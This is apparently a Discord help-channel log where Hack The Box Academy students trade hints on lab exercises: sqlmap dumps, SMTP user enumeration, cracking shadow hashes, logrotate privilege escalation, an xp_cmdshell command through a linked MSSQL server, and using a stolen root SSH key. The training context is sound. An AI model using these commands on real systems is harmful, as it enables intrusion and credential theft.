true; but you'd also likely obviously obfuscate it as a "backup" or something of that kind
Hello frens.
i am a bit stuck on this module
https://academy.hackthebox.com/module/147/section/1320
it helps to explain what you've tried and where you're stuck
I know what you are saying but any scan engine will detect it straight away unless you have rewritten the code to make it fresh.
Can someone help me with the final step on the HTTP Misconfigurations Hard Skill assessment?
have you also looked at the provided hint for the question
- 0 Examine the target and find out the password of the user Will. Then, submit the password as the answer.
Sometimes, we will not have any initial credentials available, and as the last step, we will need to bruteforce the credentials to available services to get access. From other hosts on the network, our colleagues were able to identify the user "Kira", who in most cases had SSH access to other systems with the password "LoveYou1". We have already provided a prepared list of passwords in the "Resources" section for simplicity's purpose.
this is the hint
Now I have found Wills password, how do I proceed further
Sorry I was typing in another message
if you found Will's password : put that as the answer
Then, submit the password as the answer.
^
BROO

jesus @north bramble take a break, get some air. Your brain is washed.
WTF I DID THIS LIKE 6 hours back
IT SAID FIND ROOT PW
nope; q clearly says Will
BRO I SWEAR 5 hours back it said find root from wills PW
always has
reading the question helps you answer the question 
https://academy.hackthebox.com/module/147/section/1319 < you're thinking of the next section
SHIT I AM SO STUPID THEN
I put in Will's password and it didn't accept it. I went out and came back, redid the whole thing
https://en.wikipedia.org/wiki/Cognitive_bias I recommend a read on this.
A cognitive bias is a systematic pattern of deviation from norm or rationality in judgment. Individuals create their own "subjective reality" from their perception of the input. An individual's construction of reality, not the objective input, may dictate their behavior in the world. Thus, cognitive biases may sometimes lead to perceptual distor...
LMFAOOO
I am soo stupid Sorry guys
So sorry again to waste your time Ima read the other section and proceed
what does ls -ltr do?
match command-line arguments to their help text
@echo fractal or man ls
thank you
nah i wasn't saying it's bad, just that it's the only thing you have available in the skills assessment
I was just teasing
Linux privilege escalation --> logrotate , how to force the rotation?
holy fuck
ligolo makes it very easy
just using it is way easier than sshuttle or chisel
https://academy.hackthebox.com/module/147/section/1319
on the next part. I just want to confirm if I am going right.
may I share what I have done so far?
if you have the unshadow file: you're doing it right
otherwise gotta find a way to transfer the files back to your system
-
found shadow and passwd file, copy-pasted it into my machine. simple ctrl c and v into nano editor
-
then unshadow
3, was running against rockyou, but read on forums to use mutated wordlist so using that now
Am I right?
Thanks frens
Okay cracked and got it thanks everyone
you can force it by writing to the log you found.
Now check out ligolo-ng, in case you're really just using ligolo.
Good!
nvm...
I've disappointed him
what's the sqlmap parameter to just search all databases? I know how to do the current database --current-db
but how could i figure out the other databases there
nvm got it lol
Is this the discord for the the trivia night??
Sorry to interrupt!
I think it's already over
how can i narrow down this query in sqlmap to target a specific record to just get the name and cracked hash password for kimberly? sqlmap -u http://94.237.63.93:54245/case1.php?id=1 -D testdb -T users --sql-query "SELECT * FROM users WHERE name LIKE 'Kimberly Wright'" --dump
keep getting weird outputs. funny enough the --dump does give me the full table with kims cracked password but how can i tailor the command to just dump kim's name and cracked password
Is "name" the name of the Column?
Also: spoilers dude
I dont want to exclude content that's needed for the question
It should be the name of the column lol did I miss that
¯\_(ツ)_/¯
But tbh if your command here gets or is close to the answer it can be a spoiler
When it comes to documenting and reporting findings, can each finding (ex: LFI) be associated with multiple systems in the report, OR should there be one finding for each system affected by the finding?
Each system can have different implications for the finding
So there should be a single finding listed per affected system because the details of the finding can be different than the same finding for another affected system?
can someone give me a hint with the attack vector for the skills assessment for the "SQLMap" module
Attempt to find a way that a user would traditionally interact with the site, if it were a real site. Use a proxy to intercept some requests.
I've been doing that
I've tested 3 post requests
it depends, if the vulnerability is the same which means the recommendation will be the same, then I'd put it under the same finding
And just list the affected systems and how you found the vulnerability for each under the single finding?
^ it just depends
there's no strictly the right way, write it in the way that it makes sense and meaningful to the customer
Just be consistent
Hello, I am stuck on the following question in the SMTP module in the FOOTPRINTING module:
Enumerate the SMTP service even further and find the username that exists on the system. Submit it as the answer.
my code is the following but I get several SUCC values and I tried them all in the answer section but it doesn't work, can you help me?
smtp-user-enum -m RCPT -U /usr/share/wordlists/metasploit/unix_users.txt 10.129.42.85 25
can someone give me a hint with the attack vector for the skills assessment for the "SQLMap" module? I've looked for post requests with a proxy and can't find a vulnerable one for the life of me
Use the wordlist provided by the module in the resources
@cloud urchin I could not find it, there is no wordlist in the module
There definitely is
CTRL+F and type resources
@cloud urchin Thank you, I didn't see it.
I found it by clicking every single link on the site with Burp until I found it
I found it
thank you
awesome
Anyone able to help me with this part of the Linux PTT of the password attacks module?
I feel as though I've followed all the steps in the example but I still can't get it to work.
from the Digital Forensics final skill assessment. The question: Determine the registry key used for persistence and enter it as your answer. . I have gotten the windows.kapefiles.target artifacts which has all the registry hives. But I have no clue what to do next since the target machine has no tools except Velociraptor. I am not sure how to use Velociraptor to go about finding this information. Any tips or guidance?
I just wanna know if I'm making a stupid mistake, is it asking me, once I've followed all the steps, to connect to //dc01/c$?
or another C drive? seems like a badly worded question to me
Hey
did you ever get a response to this?
can i dm a mod or htb staff please
Why do you need to dm them?
I have an issue with linking my htb account to discord
Then just dm a mod that's online
https://academy.hackthebox.com/module/116/section/1468#questionsDiv
Managed to gain access to sqlcmd
Now enabled xp_cmdshell but when trying to read the flag
```
EXEC('EXECUTE AS LOGIN = ''john''; EXEC xp_cmdshell ''type C:\Users\Administrator\Desktop\flag.txt''') AT [LOCAL.TEST.LINKED.SRV]
2> GO
Msg 229, Level 14, State 5, Server WIN-HARD\SQLEXPRESS, Procedure xp_cmdshell, Line 1
The EXECUTE permission was denied on the object 'xp_cmdshell', database 'mssqlsystemresource', schema 'sys'.
```
Try as John as sa
If this is hard lab, you need to do EXECUTE() at()
There's an example I believe of reading files remotely
It's in the sql section
It is the hard lab
The example you're talking of is in the sql section of that module
stupid question but just to make sure, in Kerberos by keys we mean password, right?
for example the TGT is protected with the KDC key, and the TGS ticket is protected with the service account key
oh i see what you are saying
No. They are cryptographic keys used to encrypt and protect the integrity of the tickets.
the keys can be derived from passwords or other means
it's clear now, ty man
Hello, Im on the getting started module and on the priv esc section I'm stuck on the last task. It is asking me to elevate my privs to root. Here's what I did. I went to /root/.ssh and was able to read id_rsa. I copied the contents, returned to my kali machine and made a file called key and pasted the key there. Then, I did chmod 600 key. After that, I try to ssh in by doing ssh user2@IP -i key -p 57170. But the problem is that it doesn't work and just asks for the password. I would appreciate any help
Why are you trying to ssh as user2 with the key?
Consider where you found it and what the goal is
I found the key in user2's /root
And I'm trying to escalate my privileges
/root/ isn't user2
Yes
(Lowercase R)
/root/ is root's home, like how /home/user2 is user2's home
root is its own user, the super user
No
It worked, thank you!
I know what exercise they're doing
ah alright that makes sense
I suggest doing the Linux Fundamentals course
As this is bare minimum linux knowledge
Another way to think of it is root for linux is like administrator for windows (mostly)
I'm pretty familiar with linux, I just thought that I should login as user2 since it was user2's rsa_id.
yeah
It wasn't user2's rsa
If it was, it wouldn't be in /root/
hi people
Oh right
(Not to mention if it was, you'd have been able to use it to log in as them)
Hello, could someone please help me with the MSSQL module from Footprinting?
For the second question, I am unsure of how to show all databases...?
The command is in the section
It's mssql, I think the commands are different.
That's what's in the lesson.
Oh
SQL (ILF-SQL-01\backdoor dbo@master)>
Depending what you're connecting with, sometimes it's dumb
Sqsh I've heard has issues
I used mssqlclient.py
Mssqlclient.py comes from the impacket suite of tools
It's on Github.
From impacket
Yes.
I didn't encounter this issue so idk what to say to fix
Are you using the command or the string. Try /usr/xxx or where it is installed
Sometimes the standalone commands from impacket can have issues
If it's in their PATH it can be called from anywhere
Ag
I know but I've been having issues with smbserver and secretsdump
That would probably be why it's broken
So ive had to use the install path
It should be installed on Parrot by default
$impacket
bash: impacket: command not found
Impacket isn't the command you goon
pip3 install impacket
error: externally-managed-environment
Add --break-system-packages
pip3 install impacket --break-system-packages
Defaulting to user installation because normal site-packages is not writeable
Requirement already satisfied: impacket in /usr/lib/python3/dist-packages (0.11.0)
Requirement already satisfied: dsinternals in /usr/lib/python3/dist-packages (from impacket) (1.2.4)
Uninstall then re install
Then it looks like the impacket suite is already installed
Bah...how do I run it?
You should be able to call it from anywhere
Pip3 uninstall impacket
Btw I'm referring to mssqlclient.py
Right, yeah I get it.
Impacket has a bunch of tools
pip3 uninstall impacket
error: externally-managed-environment
Add --break-system-packages
pip3 uninstall impacket --break-system-packages
Found existing installation: impacket 0.11.0
Not uninstalling impacket at /usr/lib/python3/dist-packages, outside environment /usr
Can't uninstall 'impacket'. No files were found to uninstall.
It's installed systemwide
Yes, and still won't run.
Not uninstalling impacket at /usr/lib/python3/dist-packages, outside environment /usr
Can't uninstall 'impacket'. No files were found to uninstall.
WARNING: Running pip as the 'root' user can result in broken permissions and conflicting behaviour with the system package manager. It is recommended to use a virtual environment instead: https://pip.pypa.io/warnings/venv
Req already satisfied for pipx...
pipx uninstall impacket
bash: pipx: command not found
did you install impacket in docker? the error 'externally-managed-environment' indicates it may be managed outside of pip
Possibly...but I haven't used it until now.
well there ya go
Okay, how do I fix it?
Hello, who else is this happening to that is not generating the target IP?
idk what you're trying to fix
I'm trying to run Impacket.
I think its down, i can't spawn a box either
Or at least, the portion of it to connect to MSSQL.
impacket is a collection of tools, you don't just 'run impacket'
python3 mssqlclient.py
python3: can't open file '/home/snow/Documents/mssqlclient.py': [Errno 2] No such file or directory
your answer is right there in your error, that file doesn't exist in that location
Do you have a link to the module please?
Well I already downloaded the script and tried running it.
Also which region are you working on?
And the commands from the lesson are not working when I connect to the MSSQL server.
Mine isn't spawning either. https://academy.hackthebox.com/module/51/section/1589
Which VPN server are you both on?
i am on USWest
US 1, 2 or 3?
looks like 'us academy 2'
Mine is working.
ty
man i just got a shell via logrotate too lol
same issue
You'll need to type the full path name if the file isn't in your current directory
